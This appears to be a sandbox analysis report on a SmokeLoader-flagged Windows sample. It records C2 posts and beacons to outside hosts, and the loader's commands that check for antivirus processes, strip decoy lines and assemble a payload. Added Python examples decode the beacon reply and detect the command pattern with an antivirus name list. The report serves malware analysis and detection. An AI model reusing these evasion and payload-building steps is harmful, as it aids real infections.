Date: Thu, 02 May 2024 18:49:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/7.4.33
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49755 | 186.10.34.243 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 20:49:39.138360977 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://uwgftqaxwugurgs.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 165
Host: cellc.org
May 2, 2024 20:49:39.138421059 CEST | 165 | OUT | Data Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 43 33 c8 89
Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vuC3^}kXI,!z[c'g\~?7`GKCON,[Su(
May 2, 2024 20:49:39.830506086 CEST | 510 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Thu, 02 May 2024 18:49:39 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/7.4.33
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49734 | 104.21.79.229 | 443 | 7736 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif

Timestamp | Bytes transferred | Direction | Data
2024-05-02 18:47:57 UTC | 56 | OUT | GET /16G965 HTTP/1.1
User-Agent: Walk
Host: 2no.co
2024-05-02 18:47:58 UTC | 1129 | IN | HTTP/1.1 200 OK
Date: Thu, 02 May 2024 18:47:58 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: close
set-cookie: 538003043210778337=3; expires=Fri, 02 May 2025 18:47:58 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
set-cookie: clhf03028ja=191.96.150.225; expires=Fri, 02 May 2025 18:47:58 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
memory: 0.42153167724609375
expires: Thu, 02 May 2024 18:47:58 +0000
Cache-Control: no-store, no-cache, must-revalidate
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O2YHDGK7gsvZq27KHxsPtvg3IlfF4SKUZxN92ngAtiiPXaNHgLoinLSyt7rs4E82gXEwbFZLaKkIHygOg9YpHzNTwtEkG4qPbiHopl29BgddB3i1IlCAxTQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87da2ecbdd0a0cc2-EWR
alt-svc: h3=":443"; ma=86400
2024-05-02 18:47:58 UTC | 122 | IN | Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
Data Ascii (non-printable bytes dropped by the sandbox): 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-05-02 18:47:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
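The 122-byte and 5-byte frames above are an HTTP/1.1 chunked body (the response declares Transfer-Encoding: chunked and Connection: close, so there is no Content-Length) carrying a PNG. The following is an added example, not part of the Joe Sandbox report, that decodes the chunked framing from the captured hex, walks the PNG chunk list, verifies every chunk's CRC-32 and inflates the IDAT stream, so an analyst can state exactly what Existence.pif fetched from 2no.co. The hex string is copied from the two Data Raw lines; the function and field names are the example's own.

```python
import struct
import zlib
from dataclasses import dataclass

# The two body frames captured for the 2no.co session, copied verbatim from
# the report's "Data Raw" lines (122 bytes, then the 5-byte last-chunk).
RAW_FRAMES_HEX = (
    "37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 "
    "00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 "
    "a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 "
    "73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 "
    "63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 "
    "0d 0a "
    "30 0d 0a 0d 0a"
)

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


@dataclass
class PngChunk:
    type: str
    length: int
    data: bytes
    crc_ok: bool


def dechunk(stream: bytes) -> bytes:
    """Decode HTTP/1.1 chunked transfer coding: hex size line, CRLF, data, CRLF,
    repeated until a zero-size chunk. Chunk extensions after ';' are ignored."""
    body = bytearray()
    pos = 0
    while True:
        eol = stream.index(b"\r\n", pos)
        size = int(stream[pos:eol].split(b";", 1)[0], 16)
        pos = eol + 2
        if size == 0:  # last-chunk; an optional trailer section and a CRLF follow
            return bytes(body)
        body += stream[pos:pos + size]
        pos += size
        if stream[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF at offset %d" % pos)
        pos += 2


def png_chunks(png: bytes) -> list:
    """Split a PNG into chunks and check each CRC-32 (computed over type + data)."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("missing PNG signature")
    chunks, pos = [], len(PNG_SIGNATURE)
    while pos + 12 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        chunks.append(PngChunk(ctype.decode("ascii"), length, data,
                               zlib.crc32(ctype + data) == crc))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks


def analyze(frames_hex: str) -> dict:
    """Dechunk the captured frames and summarise the PNG they carry."""
    body = dechunk(bytes.fromhex(frames_hex))  # fromhex tolerates the spaces
    chunks = png_chunks(body)
    by_type = {c.type: c for c in chunks}
    width, height, depth, colour = struct.unpack(">IIBB", by_type["IHDR"].data[:10])
    idat = b"".join(c.data for c in chunks if c.type == "IDAT")
    return {
        "body_len": len(body),
        "chunk_types": [c.type for c in chunks],
        "all_crc_ok": all(c.crc_ok for c in chunks),
        "width": width, "height": height,
        "bit_depth": depth, "colour_type": colour,        # 3 = indexed colour
        "scanlines": zlib.decompress(idat),               # filter byte + pixel data
        "palette0_alpha": by_type["tRNS"].data[0] if "tRNS" in by_type else 255,
    }


if __name__ == "__main__":
    for key, value in analyze(RAW_FRAMES_HEX).items():
        print(f"{key}: {value!r}")
```

The result is a 1x1, 1-bit indexed image whose only palette entry has tRNS alpha 0, i.e. a fully transparent pixel with valid CRCs throughout: the server answered the GET /16G965 beacon with a tracking-pixel style image, not with anything the process could use. Because the body is chunked with Connection: close, any tooling that waits for a Content-Length before parsing will hang on this response; the dechunk step has to drive the read.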


                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                        Start time:20:47:47
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:751'720 bytes
                                                                                                                                                                                        MD5 hash:0C4CB8FD1E3CC4B42556562D317E6E59
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                        Start time:20:47:51
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /k move Spirit Spirit.cmd & Spirit.cmd & exit
                                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                        Start time:20:47:51
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                        Start time:20:47:52
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                                        Imagebase:0x990000
                                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                        Start time:20:47:52
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                                                                                                                                                        Imagebase:0xe90000
                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                        Start time:20:47:53
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                                        Imagebase:0x990000
                                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                        Start time:20:47:53
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                                                                                                                                                        Imagebase:0xe90000
                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                        Start time:20:47:53
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:cmd /c md 1151
                                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true
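The chain recorded in Target IDs 1 through 8 is a recognisable dropped-batch loader: cmd /k renames a no-extension file to Spirit.cmd and runs it, tasklist is piped twice into findstr /I with security-product process names, a working directory is created with md 1151, and findstr /V strips lines carrying a marker string out of a second file (Appliance) to rebuild a payload. Below is an added example, not part of the report, of command-line triage logic that tags each of those steps and only raises a verdict when both the security-product check and the decoy-line strip are present, so a single odd findstr does not fire on its own. The sample records are the command lines copied from this process list plus one constructed benign line; the function and tag names are the example's own.

```python
import re

# Process names grepped for by the dropped script; each is commonly associated
# with a consumer security product (Webroot, Quick Heal, Avast, AVG, Norton, Sophos).
AV_PROCESS_NAMES = {"wrsa.exe", "opssvc.exe", "avastui.exe", "avgui.exe",
                    "nswscsvc.exe", "sophoshealth.exe"}

# Constructed sample: (Target ID, Commandline) pairs copied from the process
# list above, plus one made-up benign record (99) as a non-matching control.
SAMPLE_PROCESSES = [
    (1, '"C:\\Windows\\System32\\cmd.exe" /k move Spirit Spirit.cmd & Spirit.cmd & exit'),
    (3, 'tasklist'),
    (4, 'findstr /I "wrsa.exe opssvc.exe"'),
    (5, 'tasklist'),
    (6, 'findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"'),
    (7, 'cmd /c md 1151'),
    (8, 'findstr /V "decentrisingadvertisementssuite" Appliance'),
    (99, 'notepad.exe C:\\Users\\user\\notes.txt'),
]

# findstr /I "<name> <name> ..."  : case-insensitive search of piped tasklist output
AV_CHECK_RE = re.compile(r'findstr\s+/i\s+"([^"]+)"', re.IGNORECASE)
# findstr /V "<marker>" <file>    : print every line NOT containing the marker
DECOY_STRIP_RE = re.compile(r'findstr\s+/v\s+"([^"]+)"\s+(\S+)', re.IGNORECASE)
# move <src> <x>.cmd & <x>.cmd    : give a dropped file a script extension, then run it
RENAME_RUN_RE = re.compile(r'move\s+(\S+)\s+(\S+\.(?:cmd|bat))\s*&\s*\2', re.IGNORECASE)


def classify(cmdline: str) -> list:
    """Return technique tags for one command line; an empty list means no match."""
    tags = []
    if cmdline.strip().lower() == "tasklist":
        tags.append("process_enumeration")
    m = AV_CHECK_RE.search(cmdline)
    if m:
        hits = {n.lower() for n in m.group(1).split()} & AV_PROCESS_NAMES
        if hits:
            tags.append("av_process_check:" + ",".join(sorted(hits)))
    m = DECOY_STRIP_RE.search(cmdline)
    if m:
        tags.append("decoy_line_strip:" + m.group(2))
    m = RENAME_RUN_RE.search(cmdline)
    if m:
        tags.append("rename_and_execute:" + m.group(2))
    return tags


def triage(processes) -> tuple:
    """Classify every record. Returns ({target_id: tags} for matches only, verdict);
    the verdict fires only when the AV check and the decoy strip both appear,
    i.e. the loader pattern as a whole rather than one suspicious command."""
    findings = {tid: classify(cmd) for tid, cmd in processes}
    findings = {tid: tags for tid, tags in findings.items() if tags}
    kinds = {tag.split(":", 1)[0] for tags in findings.values() for tag in tags}
    verdict = ("batch_loader_pattern"
               if {"av_process_check", "decoy_line_strip"} <= kinds else "inconclusive")
    return findings, verdict


if __name__ == "__main__":
    findings, verdict = triage(SAMPLE_PROCESSES)
    for tid, tags in findings.items():
        print(f"Target {tid}: {', '.join(tags)}")
    print("verdict:", verdict)
```

Only the pairing matters for the verdict: tasklist and a findstr /I for product names appear in plenty of administrative scripts, while findstr /V against a marker string followed by execution of the filtered output is what distinguishes this loader family. Matching on command-line text alone also misses the pipe between tasklist and findstr, which the sandbox shows only as sibling processes; a host EDR rule would additionally key on the shared parent cmd.exe.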

                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                        Start time:20:47:53
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:findstr /V "decentrisingadvertisementssuite" Appliance
                                                                                                                                                                                        Imagebase:0x800000
                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                        Start time:20:47:55
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:cmd /c copy /b Annually + Protective 1151\b
                                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                        Start time:20:47:55
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:1151\Existence.pif 1151\b
                                                                                                                                                                                        Imagebase:0x730000
                                                                                                                                                                                        File size:947'288 bytes
                                                                                                                                                                                        MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                        Start time:20:47:55
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:ping -n 5 127.0.0.1
                                                                                                                                                                                        Imagebase:0x630000
                                                                                                                                                                                        File size:18'944 bytes
                                                                                                                                                                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                        Start time:20:48:44
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif
                                                                                                                                                                                        Imagebase:0x730000
                                                                                                                                                                                        File size:947'288 bytes
                                                                                                                                                                                        MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                        Start time:20:48:54
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                        Imagebase:0x7ff72b770000
                                                                                                                                                                                        File size:5'141'208 bytes
                                                                                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                        Start time:20:49:19
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\ssjhrji
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\ssjhrji
                                                                                                                                                                                        Imagebase:0xad0000
                                                                                                                                                                                        File size:947'288 bytes
                                                                                                                                                                                        MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                        Has exited:false


Execution Graph

Execution Coverage: 18.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 17.1%
Total number of Nodes: 1365
Total number of Limit Nodes: 20
execution_graph 3972 402643 3973 402672 3972->3973 3974 402657 3972->3974 3975 4026a2 3973->3975 3976 402677 3973->3976 3989 402d89 3974->3989 3979 402dab 21 API calls 3975->3979 3978 402dab 21 API calls 3976->3978 3980 40267e 3978->3980 3981 4026a9 lstrlenW 3979->3981 3992 406543 WideCharToMultiByte 3980->3992 3984 40265e 3981->3984 3983 402692 lstrlenA 3983->3984 3985 4026d6 3984->3985 3987 4026ec 3984->3987 3993 4060f2 SetFilePointer 3984->3993 3986 4060c3 WriteFile 3985->3986 3985->3987 3986->3987 3990 40655e 21 API calls 3989->3990 3991 402d9e 3990->3991 3991->3984 3992->3983 3994 40610e 3993->3994 4001 406126 3993->4001 3995 406094 ReadFile 3994->3995 3996 40611a 3995->3996 3997 406157 SetFilePointer 3996->3997 3998 40612f SetFilePointer 3996->3998 3996->4001 3997->4001 3998->3997 3999 40613a 3998->3999 4000 4060c3 WriteFile 3999->4000 4000->4001 4001->3985 3559 4015c6 3560 402dab 21 API calls 3559->3560 3561 4015cd 3560->3561 3579 405e9b CharNextW CharNextW 3561->3579 3563 401636 3565 401668 3563->3565 3566 40163b 3563->3566 3564 405e1d CharNextW 3570 4015d6 3564->3570 3569 401423 28 API calls 3565->3569 3585 401423 3566->3585 3576 401660 3569->3576 3570->3563 3570->3564 3575 4015ff 3570->3575 3577 40161c GetFileAttributesW 3570->3577 3589 405aec 3570->3589 3595 405acf CreateDirectoryW 3570->3595 3574 40164f SetCurrentDirectoryW 3574->3576 3575->3570 3592 405a75 CreateDirectoryW 3575->3592 3577->3570 3580 405eb8 3579->3580 3584 405eca 3579->3584 3582 405ec5 CharNextW 3580->3582 3580->3584 3581 405eee 3581->3570 3582->3581 3583 405e1d CharNextW 3583->3584 3584->3581 3584->3583 3586 4055a6 28 API calls 3585->3586 3587 401431 3586->3587 3588 406521 lstrcpynW 3587->3588 3588->3574 3590 406915 5 API calls 3589->3590 3591 405af3 3590->3591 3591->3570 3593 405ac1 3592->3593 3594 
